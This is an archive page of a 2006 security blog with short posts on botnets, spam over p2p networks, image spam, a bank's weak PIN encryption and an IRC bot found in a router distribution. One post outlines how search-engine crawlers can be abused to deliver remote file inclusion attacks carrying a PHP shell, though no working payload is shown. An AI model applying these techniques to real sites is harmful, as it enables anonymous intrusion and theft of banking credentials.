Posted on December 10th, 2006 by SecuriTeam
Filed under: Botnets, Cisco, Commentary, Corporate Security, DDoS, Full Disclosure, Microsoft, Networking, Phishing, Rootkits, Spam, Virus, Web | No Comments »
isoi 2 is finalized. the schedule and agenda can be found here:
i am going to do my best to release some of these presentation publically after the event (if the authors agree), but it is not likely.
some public feedback will be relayed from the workshop.
Posted on November 26th, 2006 by noam
Filed under: Botnets, Commentary, Corporate Security, Encryption, Full Disclosure, Phishing, Web | 15 Comments »
recently, i stumbled upon http://www.hispasec.com/laboratorio/cajamurcia_en.htm which nicely showed how a trojan horse can, utilizing a key stroke capture and screenshot capture, grab a user’s pin, fairly easily, and wondered why are they taking this approach when the pins can be easily retrieved by sniffing the data sent by the user to the banking site, even though they are “encrypted”.
image based keyboard (or virtual keyboards) were invented to make life harder for banking or phishing trojan horses (specifically key-stroke loggers or key loggers), some even suggested they be used specifically to avoid these trojan horses. the bad guys adapted to this technology and escalated. now the trojan horses take screenshots of where the mouse pointer is to determine what number they clicked on. thing is, it is often unnecessary as in most implementations of this technique that we looked into (meaning, not all) it was flawed.
instead of sending the remote image and waiting for the key-stroke information to be sent back to the server (the technique which the screenshots for pointer location on-click described above was used) some banks send the pin in cleartext, while others encrypt them, one such example is cajamurcia. even when the encryption is used, banks tend to implement it badly making it easy to recover the pin from the encrypted form.
i investigated a bit more on how cajamurcia handles such pin strokes (with virtual keyboards) and i noticed something strange, they take the timestamp of their server (cajamurcia) and send it to you – this already posses a security problem – and this timestamp is then used to encrypt the pin you entered.
this would have been a good idea if the timestamp was not sent back to the server, making it hard or semi-hard to guess the timestamp used to encrypt the data, but at the same time making it harder for the server to know what timestamp was provided to the client (unless they store it inside their session information). anyhow, as it is sent back to the server, we have everything we need to decrypt the data (pin).
a request to the server would look like:
Posted on November 23rd, 2006 by noam
Filed under: Botnets, Commentary, Corporate Security, Google, Insider Threat, Rootkits, Virus, Web | 22 Comments »
google can be utilized to hack into websites – actively exploiting them (not information gathering by the use of “google hacking”, although that is how most of the sites vulnerable to rfi attacks are found).
by placing a url on any web page, google will find it, visit it and then index it. with this mechanism, it is possible to anonymize attacks on third party web sites through google by the use of its crawler.
a malicious web page is constructed by an attacker, containing a url built like so:
1. third party site uri to attack.
2. file inclusion exploit.
3. second uri containing a malicious php shell.
google will harvest this url, visit the site using its crawler and index it.
meaning accessing the target site with the url it was provided and exploiting it unwittingly for whoever planted it. it’s a feature, not a bug.
this is currently exploited in the wild. for example, try searching google for:
and note, as an example:
which is no longer vulnerable. the %20 seems out of place, but this is how it is shown in the search.
why use a botnet when one can abuse the google crawler, which is allowed on most web sites?
1. this attack was verified on google, but there is no reason why it should not work with other search engines, web crawlers and web spiders.
2. file inclusions seem to tie in well with this attack anonymizer, but there is no reason why others attack types can’t be used in a similar fashion.
3. the feature might also be used to anonymize communication, as a covert channel.
(with thanks to Sun Shine and lev toger)
Posted on November 22nd, 2006 by SecuriTeam
Filed under: Botnets, Commentary, Corporate Security, Phishing, Spam, Virus | 4 Comments »
spam on p2p networks used to be mainly with advertising inside downloaded movies and pictures (mainly pornographic in nature), as well as by hiding viruses and other malware in downloaded warez and most any other file type (from zip archives to movie files). further, p2p networks were in the past used for harvesting by spammers.
today, p2p has become a direct to customer spamvertizing medium. this has been an ongoing change for a while. as we speak, it is moving from a proof of concept trial to a full spread of spam, day in, day out.
the idea is not new, but now it is becoming serious.
some choice picks:
ebook – googlecash – make money using google (learn to use affiliate programs to make easy money).pdf [i've been made aware this one is a real, yet pirated, book. call it a false positive]
us banks acounts information [dir]
how to create an automated ebay money machine.pdf
easy chair millionaire review.pdf
press equalizer review – flood your site with targeted traffic, achieve top rankings and gain dozens or more backlinks.pdf
top home based jobs [dir]
and so on. these are just some of the scams now being pushed over p2p.
we discussed this before; it started with fake books on the subject of online marketing, and now it has gone all the way to spammers/phishing/”affiliate programs”/spyware (or in other words online fraud related organized crime groups) looking for new ways and mediums by which to reach target audience, with email becoming more and more scrutinized and filtered.
Posted on November 20th, 2006 by SecuriTeam
Filed under: Botnets, Commentary, Spam, Web | 6 Comments »
thanks for the image to jeff chan. click on it for full size.
for months now, images have been increasingly seen in spam, reaching up to 30 to 40 per cent of all spam total. for a while, counter-measures have been in play, developed by many different folks, some we know, some we don’t. from system administrators developing signatures to a team at spamassasin working on an ocr system to break these images and check their text for spamishness.
when first encountered, a friend of mine was as excited as me: “why, it’s exactly like a captcha, only in reverse!”
hence the term i just coined – reverse captcha.
as it’s a cat and mouse game of escalations and counter-measured by bad guys and good guys, the bad guys learn and make our lives more difficult. i will try to explain what a reverse captcha is to me (and no, it’s not a special type of turing test, although we touch on that below).
Posted on November 10th, 2006 by SecuriTeam
Filed under: Botnets, Phishing, Virus, Web | 2 Comments »
websense has done some amazing work, and posted a blog entry on webattacker.
Posted on October 30th, 2006 by SecuriTeam
Filed under: Botnets, Commentary, Spam | 2 Comments »
fergie (paul ferguson) just sent this to funsec:
from the duh-its-a-bot-department!
via abc news’ “the blotter”.
a foreign hacker who penetrated security at a harrisburg, pa., water
filtering plant is under investigation by the fbi for planting
malicious software capable of affecting the plant’s water treatment
operations, abc news has learned.
the hacker tried to covertly use the computer system as its own
distribution system for e-mails or pirated software, officials told abc.
Posted on October 24th, 2006 by SecuriTeam
Filed under: Botnets, Commentary, Phishing, Privacy, Rootkits, Spam, Virus, Web | No Comments »
as can be seen in the quoted message below –
so, here we go. real-life uses for vulnerabilities.
below is an example of just one “drop-zone” server in the united states, which has “600 financial companies and banks”.
several gigs of data.
how do these things work?
Posted on October 24th, 2006 by SecuriTeam
Filed under: Botnets, Commentary | 4 Comments »
so, what i am going to talk about… a tad bit of history on vulnerabilities and their use on the internet, and then, what we are going to see on corporate, isp and internet security relating to botnets this coming year.
vulnerabilities don’t exist for the sake of vulnerabilities. they are used for something, they are a tool. botnets are much the same, using vulnerabilities on the next layer.
this past year we have seen how disclosed vulnerabilities, patched vulnerabilities and 0days have been utilized by automated kits. an inter-linked system of websites which download malicious code (update the kits), try to infect millions of users from just a couple dozen main hubs, and react to the environment.
if a certain vulnerability is seen to be more successful on certain os types or if one is found to not work, the kit will be fixed accordingly and distributed. often immediately after a patch tuesday, likely that same friday evening.
this way, income can be maximized with the number of infections, data stolen and thus roi. both from the expected response time of the vendors as well as how many victims can be reached in that window.
one such kit is webattacker, which has recently been getting more known in public circles.
Posted on October 24th, 2006 by SecuriTeam
Filed under: Botnets, Networking | 5 Comments »
i have seen a pr last month from mcafee on this issue, and now they issued another one.
for most cases, i don’t believe in ids products.
i think that trying to pitch i[dp]s as a solution for botnets is technologically silly, but marketing-wise right on the spot. as the solution it is plain and simple silly.
a lot of security vendors will now start taking that approach, dealing with the buzzword.
an ips will not cure your botnet problems. it may help pinpoint some bots (or similar) on your network, which is important, but that’s about it.
i wish mcafee all the luck in the world, but this is, in my opinion, way
way way over-hyped:
in another pr they present a case study on how they saved a south american
country from a botnet attack using their ips. i would like to see
more.. or something, to back it up as to how, before i state my opinion.
what do you think?
Posted on October 19th, 2006 by SecuriTeam
Filed under: Botnets, Networking, Virus, Web | 2 Comments »
this just hit full-disclosure:
while building and testing a customized version of devillinux router
distro i found an irc bot onboard. as far as i understood, it was
energymech compiled from source right there plus some executable named
“todo” (for camouflage purposes). the stuff unfolds at /shm/sshd/ and
runs somehow. sadly, i had no time for detailed investigation. it leaves
an overall impression of script kiddie’s work.
last days devillinux website seems to be dead.
digital channels network
update from the botnets mailing list at whitestar:
Posted on October 16th, 2006 by SecuriTeam
Filed under: Botnets, Cisco, Commentary, Networking, Spam, Virus | 8 Comments »
i am starting a discussion in the relevant groups on this subject, to try and come up with some suggestions and to-do items we can follow up on, or maybe even better – find another solution.
networks require a means by which they can control their botnet population. yes, “curing” the problem is great, but it won’t happen in the near future.
obviously, having isp’s call even one customer to remove infections doesn’t work (costs significantly more than the subscription fee per attempt) and people just get re-infected.
i am looking to utilize proven technology to be able to reduce the cost of what a botnet can do.
if botnet traffic is detected, even by not very sophisticated technologies such as simply checking for email sent from dynamic ranges or netflow data, it should be possible to use routing technology to “mitigate”.
qos can limit the traffic these bots can utilize much like it would p2p users in most isp’s today. these users are already of limited traffic due to the effects of the bot.
how can this be done using today’s technology? does it require re-design of hardware or new systems to be designed? i hope to find out and get a proposal ready,
Posted on October 13th, 2006 by SecuriTeam
Filed under: Botnets, Cisco, DDoS, Full Disclosure, Microsoft, Phishing, Spam, Virus, Web | No Comments »
the second internet security operations and intelligence (isoi) da workshop will take place on the 25th and 26th of january, 2007. it will be hosted by the microsoft corporation, in redmond wa. an after-party dinner will be hosted by trendmicro.
this workshop’s main topic is botmaster operational tactics – the use of vulnerabilities and 0day exploits in the wild. (by spyware, phishing and botnets for their businesses).
secondary subjects include ddos, phishing and general botnet subjects.
Posted on October 1st, 2006 by Thor Larholm
Filed under: Botnets, Commentary, Full Disclosure, Web | 19 Comments »
It seems like Internet Explorer has been given a lot of heat lately with a rash of 0day vulnerabilities, and if you do use IE then do yourself a favor and visit ZERT, but has the time come for Firefox to shine as well? If you take a brief look at the list of publicly known vulnerabilities in Firefox it should come as no surprise that there will naturally be a slew of undisclosed vulnerabilities as well.
At the ToorCon 2006 conference, Mischa Spiegelmock and Andrew Wbeelsoi made a point out of demonstrating a live exploit running in Firefox 126.96.36.199. Their main motivation was appareantly to create bot networks for their personal use, or in their own words – “communication networks for black hats”.
Posted on September 26th, 2006 by SecuriTeam
Filed under: Botnets, Commentary, Corporate Security, DDoS, Networking, Spam, Virus | No Comments »
is here. several companies are rehearsing their old products and buzzwording them for ddos mitigation or botnets, but not trend micro.
trend micro released a brand new product, implemented with the novel idea of utilizing dns to detect bots on an isp or corporate network.
whether by massive requests for a c&c (bots phoning home) or massive requests for an mx record (spam bots), looking for negative caching (nx being cached as the c&c is not there yet but requested) and beyond.
it works. i don’t know if that’s what trend micro is doing, but it’s one step in the right direction to better botnet detection and mitigation.
Posted on September 19th, 2006 by SecuriTeam
Filed under: Botnets, Commentary, Virus | No Comments »
yadda yadda yadda.
one thing of note for these botnets, is that im is a controlled service, and therefore these things can be controlled by the im masters is they so choose.
“we think this group have many more executable files ready and waiting to go live, so where this one will end up is anyone’s guess.”
it’s long dead (with those already infected possibly reporting to alternate c&c channels).